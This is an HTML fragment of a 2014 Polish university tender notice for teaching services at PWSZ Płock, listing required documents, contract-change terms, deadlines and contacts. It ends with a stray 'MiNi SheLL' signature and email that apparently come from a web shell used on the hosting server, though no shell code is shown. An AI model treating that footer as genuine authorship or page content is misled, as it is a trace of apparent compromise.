<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy - Załącznik nr 1
2)Pełnomocnictwo oryginał lub kopia poświadczona notarialnie osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.
3)W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi patrz Rozdział III pkt 9.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość dokonania w umowie następujących zmian:
a)zmiany wysokości wynagrodzenia, w przypadku ustawowej zmiany podatku VAT,
b)zmniejszenia do 50% wartości realizowanego zamówienia w przypadku zmniejszenia ilości godzin dydaktycznych,
c)zmiany harmonogramu realizacji zajęć (zmiany w kolejności i terminach realizacji zamówienia) w przypadku wystąpienia takiej konieczności, np. wniosku Wykonawcy
d)przedłużenia terminu umowy w przypadku zmian w organizacji procesu dydaktycznego,
e)obniżenie ilość/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany. Rozliczenie  zostanie dokonane w oparciu o koszt 1 godziny, podanej  w formularzu ofertowym stanowiącym Załącznik Nr 1 do SIWZ.   
f)aktualizacji sposobu i zakresu prowadzonych zajęć ze względu np. na zmiany obowiązujących przepisów,
g)terminu realizacji przedmiotu umowy w przypadku wystąpienia poniższych okoliczności:
-zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych,
-zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienia ziemi, bunty, niepokoje, strajki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2,pok.B 119.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 10:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, Sekretariat Kanclerza i Kwestora, pok.202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Studia niestacjonarne tzw.pomostowe - pn.Kształcenie zawodowe pielęgniarek i położnych w ramach studiów pomostowych - współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - dotyczy części nr 12
 w zakresie przedmiotu zamówienia:
-mgr Anna Borkowska - Studium Praktycznej Nauki Języków Obcych, tel. 24 366 54 00 wew.206 w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. części 1
-dr n.med. Mariola Głowacka - Instytut Nauk o Zdrowiu, tel. 24 366 54 00 wew.131 lub 723-678-817   w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. części 2-17
-dr Kinga Przybyszewska - Instytut Nauk Humanistycznych i Społecznych, tel. 609 553 646 w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. części 18-31
-mgr Ewelina Jodłowska-Niemiec - Studium Wychowania Fizycznego i Sportu, tel. 24 366 54 09 w godz. pracy Uczelni w zakresie opisu przedmiotu zamówienia dot. części 32
-mgr Magdalena Kalota - Sekcja Zamówień Publicznych i Umów, tel. 24 366-54-00 wew. 240 w godz. pracy Uczelni w zakresie proceduralnym i formalnym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com